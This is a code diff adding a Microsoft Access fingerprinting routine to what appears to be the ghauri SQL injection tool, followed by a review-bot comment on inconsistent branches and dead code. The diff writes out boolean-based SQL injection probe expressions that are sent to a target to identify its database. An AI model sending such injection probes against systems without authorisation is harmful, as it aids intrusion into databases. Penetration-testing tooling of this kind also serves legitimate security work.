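--- a/ghauri/dbms/fingerprint.py
+++ b/ghauri/dbms/fingerprint.py
@@ -213,6 +213,83 @@
 _temp = "MySQL"
 return _temp
 
+def check_access(self, heuristic_backend_check=False):
+_temp = ""
+if heuristic_backend_check:
+attack = self.check_boolean_expression(expression="VAL(CVAR(1))=1")
+attack01 = self.check_boolean_expression(
+expression=quote(
+"IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0",
+)
+)
+bool_retval = check_boolean_responses(
+self.base,
+attack,
+attack01,
+match_string=self.match_string,
+not_match_string=self.not_match_string,
+code=self.code,
+text_only=self.text_only,
+)
+result = bool_retval.vulnerable
+if result:
+is_ok = False
+if self._attacks:
+t0, f0 = self._attacks[0].status_code, self._attacks[-1].status_code
+t1, f1 = attack.status_code, attack01.status_code
+r0, r1 = self._attacks[0].redirected, attack.redirected
+is_ok = bool(t0 == t1 and f0 == f1 and r0 == r1)
+if is_ok:
+message = f"heuristic (extended) test shows that the back-end DBMS could be '{mc}Microsoft Access{nc}'"
+logger.notice(message)
+_temp = "Microsoft Access"
+else:
+logger.info(f"testing Microsoft Access")
+attack = self.check_boolean_expression(expression="VAL(CVAR(1))=1")
+bool_retval = check_boolean_responses(
+self.base,
+attack,
+self.attack01,
+match_string=self.match_string,
+not_match_string=self.not_match_string,
+code=self.code,
+text_only=self.text_only,
+)
+result = bool_retval.vulnerable
+ok = False
+if result:
+logger.info(f"confirming Microsoft Access")
+attack = self.check_boolean_expression(
+expression="IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0"
+)
+bool_retval = check_boolean_responses(
+self.base,
+attack,
+self.attack01,
+match_string=self.match_string,
+not_match_string=self.not_match_string,
+code=self.code,
+text_only=self.text_only,
+)
+result = bool_retval.vulnerable
+if not result:
+warnMsg = "the back-end DBMS is not Microsoft Access"
+logger.warning(warnMsg)
+ok = False
+return ""
+if result:
+ok = True
+else:
+warnMsg = "the back-end DBMS is not Microsoft Access"
+logger.warning(warnMsg)
+ok = False
+return ""
+if ok:
+logger.notice("the back-end DBMS is Microsoft Access")
+if ok:
+_temp = "Microsoft Access"
+return _temp
+
 def check_mssql(self, heuristic_backend_check=False):
 _temp = ""
 db_version = ""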
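Review bot: `check_access` uses the `IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0` expression in two different roles: in the `heuristic_backend_check` branch its response is passed as the third argument of `check_boolean_responses` (the slot the `else` branch fills with `self.attack01`), while in the `else` branch it is the second argument, the condition under test. It is also wrapped in `quote(...)` only in the heuristic branch, so the two paths do not send the same encoding either. Unless both differences are intended, the branches should agree; at minimum a docstring should state the truth value each expression is expected to produce and why the baseline differs between the branches. Separately, each `ok = False` placed directly before `return ""` is dead and `if ok:` is tested twice in a row, so the tail of the `else` branch can collapse to the `logger.notice(...)` call followed by `return "Microsoft Access"`; the f-strings on the two `logger.info` calls have no placeholders and can be plain strings.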